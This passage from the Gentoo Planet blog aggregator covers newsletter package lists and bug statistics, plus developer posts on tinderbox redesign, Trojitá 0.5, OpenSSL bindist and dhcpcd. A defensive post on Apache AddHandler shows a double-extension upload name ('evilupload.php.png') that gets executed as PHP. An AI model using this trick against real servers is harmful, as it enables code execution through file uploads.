201502-02 www-plugins/adobe-flash Adobe Flash Player: Multiple vulnerabilities 536562
201502-01 media-sound/mpg123 mpg123: User-assisted execution of arbitrary code 500262

Package Removals/Additions


Package Developer Date
dev-ml/obrowser aballier 02 Feb 2015
games-server/tetrix pacho 03 Feb 2015
app-emulation/wine-doors pacho 03 Feb 2015
dev-libs/libgeier pacho 03 Feb 2015
dev-games/ggz-client-libs pacho 03 Feb 2015
dev-games/libggz pacho 03 Feb 2015
games-board/ggz-gtk-client pacho 03 Feb 2015
games-board/ggz-gtk-games pacho 03 Feb 2015
games-board/ggz-sdl-games pacho 03 Feb 2015
games-board/ggz-txt-client pacho 03 Feb 2015
games-board/xfrisk pacho 03 Feb 2015
games-mud/mcl pacho 03 Feb 2015
media-gfx/photoprint pacho 03 Feb 2015
media-gfx/rawstudio pacho 03 Feb 2015
app-office/imposter pacho 03 Feb 2015
dev-python/cl pacho 03 Feb 2015
sci-physics/camfr pacho 03 Feb 2015
net-analyzer/nagios-imagepack pacho 03 Feb 2015
dev-python/orm pacho 03 Feb 2015
dev-python/testoob pacho 03 Feb 2015
app-misc/fixdos pacho 03 Feb 2015
app-arch/mate-file-archiver pacho 03 Feb 2015
app-editors/mate-text-editor pacho 03 Feb 2015
app-text/mate-document-viewer pacho 03 Feb 2015
app-text/mate-doc-utils pacho 03 Feb 2015
mate-base/libmatekeyring pacho 03 Feb 2015
mate-base/mate-file-manager pacho 03 Feb 2015
mate-base/mate-keyring pacho 03 Feb 2015
mate-extra/mate-character-map pacho 03 Feb 2015
mate-extra/mate-file-manager-image-converter pacho 03 Feb 2015
mate-extra/mate-file-manager-open-terminal pacho 03 Feb 2015
mate-extra/mate-file-manager-sendto pacho 03 Feb 2015
mate-extra/mate-file-manager-share pacho 03 Feb 2015
media-gfx/mate-image-viewer pacho 03 Feb 2015
net-wireless/mate-bluetooth pacho 03 Feb 2015
x11-libs/libmatewnck pacho 03 Feb 2015
x11-misc/mate-menu-editor pacho 03 Feb 2015
x11-wm/mate-window-manager pacho 03 Feb 2015
net-zope/zope-fixers pacho 03 Feb 2015
sys-apps/kmscon pacho 03 Feb 2015
app-office/teapot pacho 03 Feb 2015
net-irc/bitchx pacho 03 Feb 2015
sys-power/cpufrequtils pacho 03 Feb 2015
x11-plugins/gkrellm-cpufreq pacho 03 Feb 2015
media-sound/gnome-alsamixer pacho 03 Feb 2015
sys-devel/ac-archive pacho 03 Feb 2015
net-misc/emirror pacho 03 Feb 2015
net-wireless/wimax pacho 03 Feb 2015
net-wireless/wimax-tools pacho 03 Feb 2015
rox-extra/clock pacho 03 Feb 2015
app-arch/rpm5 pacho 03 Feb 2015
app-admin/gksu-polkit pacho 03 Feb 2015
sys-apps/uhinv pacho 03 Feb 2015
net-libs/pjsip pacho 03 Feb 2015
net-voip/sflphone pacho 03 Feb 2015
net-im/ekg pacho 03 Feb 2015
sys-firmware/iwl2000-ucode pacho 03 Feb 2015
sys-firmware/iwl2030-ucode pacho 03 Feb 2015
sys-firmware/iwl5000-ucode pacho 03 Feb 2015
sys-firmware/iwl5150-ucode pacho 03 Feb 2015
net-wireless/cinnamon-bluetooth pacho 03 Feb 2015
net-wireless/ussp-push pacho 03 Feb 2015
app-vim/zencoding-vim radhermit 09 Feb 2015
x11-drivers/psb-firmware chithanh 10 Feb 2015
x11-drivers/xf86-video-cyrix chithanh 10 Feb 2015
x11-drivers/xf86-video-impact chithanh 10 Feb 2015
x11-drivers/xf86-video-nsc chithanh 10 Feb 2015
x11-drivers/xf86-video-sunbw2 chithanh 10 Feb 2015
x11-libs/libdrm-poulsbo chithanh 10 Feb 2015
x11-libs/xpsb-glx chithanh 10 Feb 2015
app-admin/lxqt-admin yngwin 10 Feb 2015
net-misc/lxqt-openssh-askpass yngwin 10 Feb 2015
games-puzzle/trimines mr_bones_ 11 Feb 2015
games-action/cylindrix mr_bones_ 13 Feb 2015
net-analyzer/openvas-administrator jlec 14 Feb 2015
net-analyzer/greenbone-security-desktop jlec 14 Feb 2015
dev-ruby/flickr mrueg 19 Feb 2015
dev-ruby/gemcutter mrueg 19 Feb 2015
dev-ruby/drydock mrueg 19 Feb 2015
dev-ruby/net-dns mrueg 19 Feb 2015
virtual/ruby-rdoc mrueg 19 Feb 2015
media-fonts/libertine-ttf yngwin 22 Feb 2015
dev-perl/IP-Country zlogene 22 Feb 2015
net-dialup/gtk-imonc pinkbyte 27 Feb 2015


Package Developer Date
dev-python/jenkins-autojobs idella4 02 Feb 2015
net-analyzer/ntopng slis 03 Feb 2015
app-leechcraft/lc-intermutko maksbotan 03 Feb 2015
x11-drivers/xf86-input-libinput chithanh 04 Feb 2015
dev-python/cached-property cedk 05 Feb 2015
games-board/stockfish yngwin 05 Feb 2015
dev-util/shellcheck jlec 06 Feb 2015
app-admin/cgmanager hwoarang 07 Feb 2015
app-admin/restart_services mschiff 07 Feb 2015
app-portage/lightweight-cvs-toolkit mgorny 08 Feb 2015
lxqt-base/lxqt-admin yngwin 10 Feb 2015
lxqt-base/lxqt-openssh-askpass yngwin 10 Feb 2015
sys-apps/inxi dastergon 10 Feb 2015
dev-python/pyamf radhermit 10 Feb 2015
app-doc/clsync-docs bircoph 11 Feb 2015
dev-libs/libclsync bircoph 11 Feb 2015
app-admin/clsync bircoph 11 Feb 2015
dev-ruby/hiera-eyaml robbat2 12 Feb 2015
dev-ruby/gpgme robbat2 12 Feb 2015
dev-ruby/hiera-eyaml-gpg robbat2 12 Feb 2015
app-shells/mpibash ottxor 13 Feb 2015
dev-ruby/vcard mjo 14 Feb 2015
dev-ruby/ruby-ole mjo 14 Feb 2015
dev-ml/easy-format aballier 15 Feb 2015
dev-ml/biniou aballier 15 Feb 2015
dev-ml/yojson aballier 15 Feb 2015
app-i18n/ibus-libpinyin dlan 16 Feb 2015
dev-libs/libusbhp vapier 16 Feb 2015
media-tv/kodi vapier 16 Feb 2015
dev-python/blessings jlec 17 Feb 2015
dev-perl/ExtUtils-CChecker chainsaw 17 Feb 2015
dev-python/wcwidth jlec 17 Feb 2015
dev-python/curtsies jlec 17 Feb 2015
dev-perl/Socket-GetAddrInfo chainsaw 17 Feb 2015
dev-python/elasticsearch-curator idella4 17 Feb 2015
dev-java/oracle-javamail fordfrog 17 Feb 2015
net-misc/linuxptp tomjbe 18 Feb 2015
dev-haskell/preprocessor-tools slyfox 18 Feb 2015
dev-haskell/hsb2hs slyfox 18 Feb 2015
media-plugins/vdr-recsearch hd_brummy 20 Feb 2015
media-fonts/ohsnap yngwin 20 Feb 2015
sci-libs/Rtree slis 20 Feb 2015
media-plugins/vdr-dvbapi hd_brummy 20 Feb 2015
dev-ml/typerep_extended aballier 20 Feb 2015
media-fonts/lohit-assamese yngwin 20 Feb 2015
media-fonts/lohit-bengali yngwin 20 Feb 2015
media-fonts/lohit-devanagari yngwin 20 Feb 2015
media-fonts/lohit-gujarati yngwin 20 Feb 2015
media-fonts/lohit-gurmukhi yngwin 20 Feb 2015
media-fonts/lohit-kannada yngwin 20 Feb 2015
media-fonts/lohit-malayalam yngwin 20 Feb 2015
media-fonts/lohit-marathi yngwin 20 Feb 2015
media-fonts/lohit-nepali yngwin 20 Feb 2015
media-fonts/lohit-odia yngwin 20 Feb 2015
media-fonts/lohit-tamil yngwin 20 Feb 2015
media-fonts/lohit-tamil-classical yngwin 20 Feb 2015
media-fonts/lohit-telugu yngwin 20 Feb 2015
media-fonts/ipaex yngwin 21 Feb 2015
dev-perl/Unicode-Stringprep dilfridge 21 Feb 2015
dev-perl/Authen-SASL-SASLprep dilfridge 21 Feb 2015
dev-perl/Crypt-URandom dilfridge 21 Feb 2015
dev-perl/PBKDF2-Tiny dilfridge 21 Feb 2015
dev-perl/Exporter-Tiny dilfridge 21 Feb 2015
dev-perl/Type-Tiny dilfridge 21 Feb 2015
dev-perl/Authen-SCRAM dilfridge 21 Feb 2015
dev-perl/Safe-Isa dilfridge 21 Feb 2015
dev-perl/syntax dilfridge 21 Feb 2015
dev-perl/Syntax-Keyword-Junction dilfridge 21 Feb 2015
net-analyzer/monitoring-plugins mjo 21 Feb 2015
dev-perl/Validate-Tiny monsieurp 22 Feb 2015
sys-firmware/iwl7265-ucode prometheanfire 22 Feb 2015
media-fonts/libertine yngwin 22 Feb 2015
net-dns/hash-slinger mschiff 22 Feb 2015
dev-util/bitcoin-tx blueness 23 Feb 2015
dev-python/jsonfield jlec 24 Feb 2015
dev-lua/lualdap chainsaw 24 Feb 2015
media-fonts/powerline-symbols yngwin 24 Feb 2015
app-emacs/wgrep ulm 24 Feb 2015
dev-python/trollius radhermit 25 Feb 2015
dev-perl/Pegex dilfridge 25 Feb 2015
dev-perl/Inline-C dilfridge 25 Feb 2015
dev-perl/Test-YAML dilfridge 25 Feb 2015
dev-python/asyncio prometheanfire 26 Feb 2015
dev-python/aioeventlet prometheanfire 26 Feb 2015
dev-python/neovim-python-client yngwin 26 Feb 2015
dev-lua/messagepack yngwin 26 Feb 2015
dev-libs/unibilium yngwin 26 Feb 2015
dev-libs/libtermkey yngwin 26 Feb 2015
app-editors/neovim yngwin 26 Feb 2015
dev-python/prompt_toolkit jlec 27 Feb 2015
dev-python/ptpython jlec 27 Feb 2015
dev-python/oslo-log prometheanfire 28 Feb 2015
dev-python/tempest-lib prometheanfire 28 Feb 2015
dev-python/mistune jlec 28 Feb 2015
dev-python/terminado jlec 28 Feb 2015
dev-python/ghp-import alunduil 28 Feb 2015
dev-python/mysqlclient jlec 28 Feb 2015


The Gentoo community uses Bugzilla to record and track bugs, notifications, suggestions and other interactions with the development team.


The following tables and charts summarize the activity on Bugzilla between 01 February 2015 and 28 February 2015. Not fixed means bugs that were resolved as NEEDINFO, WONTFIX, CANTFIX, INVALID or UPSTREAM.

Bug Activity Number
New 1820
Closed 1519
Not fixed 281
Duplicates 162
Total 6621
Blocker 3
Critical 18
Major 68

Closed bug ranking

The following table outlines the teams and developers with the most bugs resolved during this period

Rank Team/Developer Bug Count
1 Gentoo Games 188
2 Gentoo Security 52
3 Python Gentoo Team 45
4 Gentoo's Team for Core System packages 37
5 Gentoo KDE team 35
6 Gentoo X packagers 30
7 Gentoo Science Related Packages 29
8 Gentoo Perl team 29
9 Gentoo Linux Gnome Desktop Team 27
10 Others 1046


Assigned bug ranking

The developers and teams who have been assigned the most bugs during this period are as follows.

Rank Team/Developer Bug Count
1 Gentoo Games 177
2 Gentoo Linux bug wranglers 133
3 Gentoo Security 66
4 Python Gentoo Team 50
5 Portage team 46
6 Gentoo KDE team 38
7 Gentoo X packagers 36
8 Gentoo's Team for Core System packages 36
9 Java team 35
10 Others 1202



Getting Involved?

Interested in helping out? The GMN relies on volunteers and members of the community for content every month. If you are interested in writing for the GMN or thinking of another way to contribute, please send an e-mail to gmn@gentoo.org.

Comments or Suggestions?

Please head over to this forum post.

Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (March 07, 2015, 06:45 UTC)

TL;DR: Gentoo was not selected for GSoC 2015 “to make way for new orgs”. All is not lost: some Gentoo projects will be available within other organizations.

As you may have already noted, the Gentoo Foundation was not selected as a mentoring organization for GSoC 2015. Many immediately started to speculate why that happened.

Today I had an opportunity to talk (on irc) to Carol Smith, from Google’s Open Source Programs Office. I asked her why we had been rejected, if they had seen any issue with our application to GSoC, and if she had comments about it. Here’s what her answer was:

yeah, i’m sorry that this is going to be disappointing
but this was just us trying to make way for new orgs this year :-(
i don’t see anything wrong with your ideas page or application, it looks good

Then I asked her the following:

one discussion we had after our rejection is if we should keep focusing on doing GSoC to attract contributors as we’ve been doing, or focus more on having projects actually be implemented, and how much you cared about it

To which she replied:

well, i’ll say that wasn’t a factor in this rejection
having said that, we in general like to see more new developers instead of the same ones year over year
we’d prefer gsoc was used to attract new members of the community
but like i said, that wasn’t a factor in your case

It’s pretty clear we haven’t done anything wrong, and that they like what we do and the way we do it. Which doesn’t mean we can’t improve, by the way. I know Carol well enough to be sure she was not dodging my questions to politely brush me aside. She says things as they are.

So, what happened then? First, the overall number of accepted organizations went down roughly 30% compared to last year. The immediate thought which comes to mind is “budget cut”. Maybe. But the team who organizes GSoC is largely the same year over year. You can’t indefinitely grow an organization at constant manpower. And last year was big.

Second, and probably the main reason why we were rejected is that this year small and/or newer organizations were favored. This was explicitly said by Carol (and I believe others) multiple times. I’m sure some of you will argue that this isn’t a good idea, but the fact is it’s their program and they run it the way they want. I will certainly not blame them. This does not mean no large organizations were selected, but that tough choices had to be made among them.

In my opinion, Carol’s lack of words to explain why we were not selected meant “not bad but not good enough”. The playing field is improving every year. We surely felt a little too confident and now have to step up our game. I have ideas for next year, these will be discussed in due time.

In the meantime, some Gentoo projects will be available within other organizations. I will not talk about what hasn’t been announced yet, but I can certainly make this one official:
glee: Gentoo-based Linux appliances on Minnowboard
If you’re interested, feel free to contact me directly.

March 06, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Trying out Pelican, part one (March 06, 2015, 18:02 UTC)

One of the goals I’ve set myself this year (not as a new year resolution though, I *really* want to accomplish this ;-) is to move my blog from WordPress to a statically built website. And Pelican looks to be a good solution to do so. It’s based on Python, which is readily available and supported on Gentoo, and is quite readable. Also, it looks to be very active in development and support. And also: it supports taking data from an existing WordPress installation, so that none of the posts are lost (with some rounding error that’s inherent to such migrations of course).

Before getting Pelican ready (which is available through Gentoo btw) I also needed to install pandoc, and that became more troublesome than expected. While installing pandoc I got hit by its massive number of dependencies on dev-haskell/* packages, and many of those packages failed to install. It does some internal dependency checking and fails, telling me to run haskell-updater. Sadly, multiple re-runs of said command did not resolve the issue. In fact, it wasn’t until I hit a forum post about the same issue that a first step towards a working solution was found.

It turns out that the ~arch versions of the haskell packages work better. So I enabled dev-haskell/* in my package.accept_keywords file. And then started updating the packages… which also failed. Then I ran haskell-updater multiple times, but that also failed. After a while, I had to run the following set of commands (in random order) just to get everything to build fine:

~# emerge -u $(qlist -IC dev-haskell) --keep-going
~# for n in $(qlist -IC dev-haskell); do emerge -u $n; done

It took quite some reruns, but it finally got through. I never thought I had this many Haskell-related packages installed on my system (89 packages here to be exact), as I never intended to do any Haskell development since I left the university. Still, I finally got pandoc to work. So, on to the migration of my WordPress site… I thought.

This is a good time to ask for stabilization requests (I’ll look into it myself as well of course) but also to see if you can help out our arch testing teams to support the stabilization requests on Gentoo! We need you!

I started with the official docs on importing. Looks promising, but it didn’t turn out too well for me. Importing was okay, but immediately building the site afterwards resulted in issues about wrong arguments (file names being interpreted as an argument name or function when an underscore was used) and in misinterpretation of code inside the posts. Then I found Jason Antman’s post on converting WordPress posts to Pelican markdown, which informed me I had to try using markdown instead of restructured text. And lo and behold – that’s much better.

The first builds look promising. Of all the posts that I made on WordPress, only one gives a build failure. The next thing to investigate is theming, as well as seeing how well the migration really went (the absence of build errors doesn’t by itself mean the migration is successful, of course) so that I know how much manual labor I have to take into consideration when I finally switch (right now, I’m still running WordPress).

March 05, 2015
Paweł Hajdan, Jr. a.k.a. phajdan.jr (homepage, bugs)

I've been occasionally hitting frustrating issues with bash history getting lost after a crash. Then I found this great blog post about keeping bash history in sync on disk and between multiple terminals.

tl;dr is to use "shopt -s histappend" and PROMPT_COMMAND="${PROMPT_COMMAND};history -a"

The first is usually default, and results in sane behavior when you have multiple bash sessions at the same time. Now the second one ("history -a") is really useful to flush the history to disk in case of crashes.

I'm happy to announce that both are now default in Gentoo! Please see bug #517342 for reference.

February 26, 2015
Service relaunch: archives.gentoo.org (February 26, 2015, 23:02 UTC)

The Gentoo Infrastructure team is proud to announce that we have re-engineered the mailing list archives, and re-launched it, back at archives.gentoo.org. The prior Mhonarc-based system had numerous problems, and a complete revamp was deemed the best solution to move forward with. The new system is powered by ElasticSearch (more features to come).

All existing URLs should either work directly, or redirect you to the new location for that content.

Major thanks to Alex Legler, for his development of this project.

Note that we're still doing some catchup on newer messages, but delays will drop to under 2 hours soon, with an eventual goal of under 30 minutes.

Please report problems to Bugzilla: Product Websites, Component Archives

February 24, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
TG4: Tinderbox Generation 4 (February 24, 2015, 21:08 UTC)

Everybody's a critic: the first comment I received when I showed other Gentoo developers my previous post about the tinderbox was a question on whether I would be using pkgcore for the new generation tinderbox. If you have understood what my blog post was about, you probably understand why I was not happy about such a question.

I thought the blog post made it very clear that my focus right now is not to change the way the tinderbox runs but the way the reporting pipeline works. This is the same problem as 2009: generating build logs is easy, sifting through them is not. At first I thought this was hard just for me, but the fact that GSoC attracted multiple people interested in doing continuous builds, but not one interested in logmining, showed me this is just a hard problem.

The approach I took last time, with what I'll start calling TG3 (Tinderbox Generation 3), was to highlight the error/warning messages, provide a list of build logs for which a problem was identified (without caring much for which kind of problem), and just show broken builds or broken tests in the interface. This was easy to build, and to a point easy to use, but it had a lot of drawbacks.

The major drawbacks in that UI are that it relies on manual work to identify open bugs for the package (and thus make sure not to report duplicate bugs), and on my own memory not to report the same issue multiple times if the bug was closed, say as NEEDINFO.

I don't have my graphic tablet with me to draw a mock of what I have in mind yet, but I can throw in some of the things I've been thinking of:

  • Being able to tell what problem or problems a particular build is about. It's easy to tell whether a build log is just a build failure or a test failure, but what if instead it has three or four different warning conditions? Being able to tell which ones have been found and having a single-click bug filing system would be a good start.
  • Keep in mind the bugs filed against a package. This is important because sometimes a build log is just a repeat of something filed already; it may be that it failed multiple times since you started a reporting run, so it might be better to show that easily.
  • Related, it should collapse failures for packages so as not to repeat the same package multiple times on the page. Say you look at the build failures every day or two, you don't care if the same package failed 20 times, especially if the logs report the same error. Finding out whether the error messages are the same is tricky, but at least you can collapse the multiple logs in a single log per package, so you don't need to skip it over and over again.
  • Again related, it should keep track of which logs have been read and which weren't. It's going to be tricky if the app is made multi-user, but at least a starting point needs to be there.
  • It should show the three most recent bugs open for the package (and a count of how many other open bugs) so that if the bug was filed by someone else, it does not need to be filed again. Bonus points for showing the few most recently reported closed bugs too.

You can tell already that this is a considerably more complex interface than the one I used before. I expect it'll take some work with JavaScript at the very least, so I may end up doing it with AngularJS and Go mostly because that's what I need to learn at work as well, don't get me started. At least I don't expect I'll be doing it in Polymer but I won't exclude that just yet.

Why do I spend this much time thinking and talking (and soon writing) about UI? Because I think this is the current bottleneck to scale up the amount of analysis of Gentoo's quality. Running a tinderbox is getting cheaper — there are plenty of dedicated server offers that are considerably cheaper than what I paid for hosting Excelsior, let alone the initial investment in it. And this is without going to look again at the possible costs of running them on GCE or AWS at request.

Three years ago, my choice of a physical server in my hands was easier to justify than now, with 4-core HT servers with 48GB of RAM starting at €40/month — while I/O is still the limiting factor, with that much RAM it's well possible to have one tinderbox building fully in tmpfs, and just run a separate server for a second instance, rather than sharing multiple instances.

And even if GCE/AWS instances that are charged for time running are not exactly interesting for continuous build systems, having a cloud image that can be instructed to start running a tinderbox with a fixed set of packages, say all the reverse dependencies of libav, would make it possible to run explicit tests for code that is known to be fragile, while not pausing the main tinderbox.

Finally, there are different ideas of how we should be testing packages: all options enabled, all options disabled, multilib or not, hardened or not, one package at a time, all packages together… they can all share the same exact logmining pipeline, as all it needs is the emerge --info output, and the log itself, which can have markers for known issues to look out for or not. And then you can build the packages however you desire, as long as you can submit them there.

Now my idea is not to just build this for myself and run analysis over all the people who want to submit the build logs, because that would be just about as crazy. But I think it would be okay to have a shared instance for Gentoo developers to submit build logs from their own personal instances, if they want to, and then have them look at their own accounts only. It's not going to be my first target but I'll keep that in mind when I start my mocks and implementations, because I think it might prove successful.

February 23, 2015
Jan Kundrát a.k.a. jkt (homepage, bugs)
Trojita 0.5 is released (February 23, 2015, 11:02 UTC)

Hi all,
we are pleased to announce version 0.5 of Trojitá, a fast Qt IMAP e-mail client. More than 500 changes went in since the previous release, so the following list highlights just a few of them:

  • Trojitá can now be invoked with a mailto: URL (RFC 6068) on the command line for composing a new email.
  • Messages can be forwarded as attachments (support for inline forwarding is planned).
  • Passwords can be remembered in a secure, encrypted storage via QtKeychain.
  • E-mails with attachments are decorated with a paperclip icon in the overview.
  • Better rendering of e-mails with extraordinary MIME structure.
  • By default, only one instance is kept running, and can be controlled via D-Bus.
  • Trojitá now provides better error reporting, and can reconnect on network failures automatically.
  • The network state (Offline, Expensive Connection or Free Access) will be remembered across sessions.
  • When replying, it is now possible to retroactively change the reply type (Private Reply, Reply to All but Me, Reply to All, Reply to Mailing List, Handpicked).
  • When searching in a message, Trojitá will scroll to the current match.
  • Attachment preview for quick access to the enclosed files.
  • The mark-message-read-after-X-seconds setting is now configurable.
  • The IMAP refresh interval is now configurable.
  • Speed and memory consumption improvements.
  • Miscellaneous IMAP improvements.
  • Various fixes and improvements.
  • We have increased our test coverage, and are now making use of an improved Continuous Integration setup with pre-commit patch testing.

This release has been tagged in git as "v0.5". You can also download a tarball (GPG signature). Prebuilt binaries for multiple distributions are available via the OBS, and so is a Windows installer.

We would like to thank Karan Luthra and Stephan Platz for their efforts during Google Summer of Code 2014.

The Trojitá developers

  • Jan Kundrát
  • Pali Rohár
  • Dan Chapman
  • Thomas Lübking
  • Stephan Platz
  • Boren Zhang
  • Karan Luthra
  • Caspar Schutijser
  • Lasse Liehu
  • Michael Hall
  • Toby Chen
  • Niklas Wenzel
  • Marko Käning
  • Bruno Meneguele
  • Yuri Chornoivan
  • Tomáš Chvátal
  • Thor Nuno Helge Gomes Hultberg
  • Safa Alfulaij
  • Pavel Sedlák
  • Matthias Klumpp
  • Luke Dashjr
  • Jai Luthra
  • Illya Kovalevskyy
  • Edward Hades
  • Dimitrios Glentadakis
  • Andreas Sturmlechner
  • Alexander Zabolotskikh

Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The tinderbox is dead, long live the tinderbox (February 23, 2015, 03:24 UTC)

I announced it last November and now it became reality: the Tinderbox is no more, in hardware as well as software. Excelsior was taken out of the Hurricane Electric facility in Fremont this past Monday, just before I left for SCALE13x.

Originally the box was hosted by my then-employer, but as of last year, to allow more people to have access to it, I had it moved to my own rented cabinet, at a figure of $600/month. Not chump change, but it was okay for a while; unfortunately the cost-sharing option that was supposed to happen did not happen, and about a year later those $7200 do not feel like a good choice, and this is without delving into the whole insulting behavior of a fellow developer.

Right now the server is lying on the floor of an office in the Mountain View campus of my (current) employer. The future of the hardware is uncertain right now, but it's more likely than not going to be donated to Gentoo Foundation (minus the HDDs for obvious opsec). I'm likely going to rent a dedicated server of my own for development and testing, as even though they would be less powerful than Excelsior, they would be massively cheaper at €40/month.

The question becomes what we want to do with the idea of a tinderbox — it seemed like after I announced the demise, people would get together to fix it once and for all, but four months later there is nothing to show for it. After speaking with other developers at SCaLE, and realizing I'm probably the only one with enough domain knowledge of the problems I tackled, I decided it's time for me to stop running a tinderbox and instead design one.

I'm going to write a few more blog posts to get into the nitty-gritty details of what I plan on doing, but I would like to provide at least a high-level idea of what I'm going to change drastically in the next iteration.

The first difference will be the target execution environment. When I wrote the tinderbox analysis scripts, I designed them to run in a mostly sealed system. Because the tinderbox was running in someone else's cabinet, within its management network, I decided I would not provide any direct access to either the tinderbox container or the app that would mangle that data. This is why the storage for both the metadata and the logs was Amazon: pushing the data out was easy and did not require me to give anyone else access to the system.

In the new design this will not be important — not only because it'll be designed to push the data directly into Bugzilla, but more importantly because I'm not going to run a tinderbox in such an environment. Well, admittedly I'm just not going to run a tinderbox ever again, and will just build the code to do so, but the whole point is that I won't keep that restriction on to begin with.

And since the data store is now only temporary, I don't think it's worth over-optimizing for performance. While I originally considered and dropped the option of storing the logs in PostgreSQL for performance reasons, now this is unlikely to be a problem. Even if the queries took seconds, it's not like this is going to be a deal breaker for an app with a single user. Even more importantly, the time taken to create the bug on the Bugzilla side is likely going to overshadow any database inefficiency.

The part that I've still got some doubts about is how to push the data from the tinderbox instance to the collector (which may or may not be the webapp that opens the bugs too). Right now the tinderbox does some analysis through bashrc, leaving warnings in the log — the log is then sent to the collector through tar and netcat (chewing gum and saliva, yes, really) to maintain one single piece of metadata: the filename.

I would like to be able to collect some metadata on the tinderbox side (namely, emerge --info, which before was cached manually) and send it down to the collector. But adding this much logic is tricky, as the tinderbox should still operate with most of the operating system busted. My original napkin plan involved having the agent written in Go, using Apache Thrift to communicate to the main app, probably written in Django or similar.

The reason why I'm saying that Go would be a good fit is because of one piece of its design I do not like (in the general use case) at all: the static compilation. A Go binary will not break during a system upgrade of any runtime, because it has no runtime; which is in my opinion a bad idea for a piece of desktop or server software, but it's a godsend in this particular environment.

The reason I was considering Thrift was that I didn't want to look into XML-RPC or JSON-RPC. But then again, Bugzilla supports only those two, and my main concern (the size of the log files) would still be a problem when attaching them to Bugzilla just as much. Since Thrift would require me to package it for Gentoo (it seems nobody has yet), while JSON-RPC is already supported in Go, I think it might be a better idea to stick with JSON. Unfortunately Go does not support UTF-7, which would make escaping binary data much easier.

Now what remains a problem is filing the bug and attaching the log to Bugzilla. If I were to write that part of the app in Python, it would be just a matter of using the pybugz libraries to handle it. But with JSON-RPC it should be fairly easy to implement support for it from scratch (unlike XML-RPC) so maybe it's worth just doing the whole thing in Go, and reduce the proliferation of languages in use for such a project.
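As a rough illustration of why talking JSON-RPC to Bugzilla from scratch is tractable, here is a minimal sketch in Python (the jsonrpc.cgi endpoint and the Bug.create method follow the Bugzilla WebService API; the product and component values below are placeholders of my own, not necessarily valid Gentoo ones):

```python
import json
import urllib.request


def file_bug(base_url, token, summary, description):
    """Sketch of filing a bug through Bugzilla's JSON-RPC interface.

    Bugzilla's JSON-RPC endpoint expects params as a one-element array
    containing the argument object; the API token rides along inside it.
    """
    payload = {
        "method": "Bug.create",
        "params": [{
            "Bugzilla_token": token,
            "product": "Some Product",        # placeholder
            "component": "Some Component",    # placeholder
            "version": "unspecified",
            "summary": summary,
            "description": description,
        }],
        "id": 1,
    }
    req = urllib.request.Request(
        base_url + "/jsonrpc.cgi",
        data=json.dumps(payload).encode("utf-8"),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)
```

Attaching the (potentially huge) logs would go through Bug.add_attachment in the same style, which is exactly where the log-size concern mentioned above bites.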

Python will remain in use for the tinderbox runner. Actually if anything I would like to remove the bash wrapper I've written and do the generation and selection of which packages to build in Python. It would also be nice if it could handle the USE mangling by itself, but that's difficult due to the sad conflicting requirements of the tree.

But this is enough details for the moment; I'll go back to thinking the implementation through and add more details about that as I get to them.

February 21, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)


On a rather young Gentoo setup of mine I ran into SSLV3_ALERT_HANDSHAKE_FAILURE from rss2email.
Plain Python showed it, too:

# python -c "import urllib2; \
    urllib2.urlopen('')" \
    |& tail -n 1
urllib2.URLError: <urlopen error [SSL: SSLV3_ALERT_HANDSHAKE_FAILURE] \
    sslv3 alert handshake failure (_ssl.c:581)>

On other machines this yields

urllib2.HTTPError: HTTP Error 403: Forbidden


It turned out I overlooked USE="bindist ..." in /etc/portage/make.conf which is sitting there by default.
On OpenSSL, bindist disables elliptic curve support. So that is where the SSLV3_ALERT_HANDSHAKE_FAILURE came from.
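A quick way to check whether the local OpenSSL build offers elliptic-curve cipher suites at all is to ask Python's ssl module (a Python 3.6+ sketch; the traceback above is Python 2, but the underlying OpenSSL is the same):

```python
import ssl

# With USE="bindist" stripping EC support from OpenSSL, the ECDHE
# suites below would be missing, causing handshake failures against
# servers that only offer elliptic-curve key exchange.
ctx = ssl.create_default_context()
ecdhe = [c["name"] for c in ctx.get_ciphers() if "ECDHE" in c["name"]]
print("ECDHE cipher suites available:", len(ecdhe))
```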

February 17, 2015
Denis Dupeyron a.k.a. calchan (homepage, bugs)
Google Summer of Code 2015 (February 17, 2015, 04:47 UTC)

This is a quick informational message about GSoC 2015.

The Gentoo Foundation is in the process of applying to GSoC 2015 as an organization. This is the 10th year we'll participate in this very successful and exciting program.

Right now, we need you to propose project ideas. You do not need to be a developer to propose an idea. First, open this link in a new tab/window. Change the title My_new_idea in the URL to the actual title, load the page again, fill in all the information and save the article. Then, edit the ideas page and include a link to it. If you need any help with this, or advice regarding the description or your idea, come talk to us in #gentoo-soc on Freenode.


February 15, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Apache AddHandler madness all over the place (February 15, 2015, 21:44 UTC)


A friend of mine ran into known (though not well-known) security issues with Apache’s AddHandler directive.
Basically, Apache configuration like

# Avoid!
AddHandler php5-fcgi .php

applies to a file called evilupload.php.png, too. Yes.
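The commonly recommended safer pattern anchors the match to the end of the filename with FilesMatch and SetHandler (handler name taken from the example above; adapt it to your setup):

```apache
# Only files actually ending in ".php" get the PHP handler;
# evilupload.php.png no longer matches.
<FilesMatch "\.php$">
    SetHandler php5-fcgi
</FilesMatch>
```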
Looking at the current Apache documentation, it should clearly say that AddHandler should not be used any more for security reasons.
That’s what I would expect. What I find as of 2015-02-15 looks different:

Maybe that’s why AddHandler is still proposed all across the Internet:

And maybe that’s why it made its way into app-admin/eselect-php (bug #538822).

Please join the fight. Time to get AddHandler off the Internet!

I ❤ Free Software 2015-02-14 (February 15, 2015, 20:19 UTC)

I’m late. So what :)

I love Free Software!

February 08, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Have dhcpcd wait before backgrounding (February 08, 2015, 14:50 UTC)

Many of my systems use DHCP for obtaining IP addresses. Even though they all receive a static IP address, it allows me to have them moved over (migrations), use TFTP boot, cloning (in case of quick testing), etc. But one of the things that was making my efforts somewhat more difficult was that the dhcpcd service was considered started (the dhcpcd daemon immediately went into the background) even though no IP address had been obtained yet. Subsequent service scripts that required a working network connection then failed to start.

The solution is to configure dhcpcd to wait for an IP address. This is done through the -w option, or the waitip instruction in the dhcpcd.conf file. With that in place, the service script now waits until an IP address is assigned.
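For reference, the dhcpcd.conf change is a one-liner (per dhcpcd.conf(5); the optional argument restricts which protocol to wait for):

```
# /etc/dhcpcd.conf
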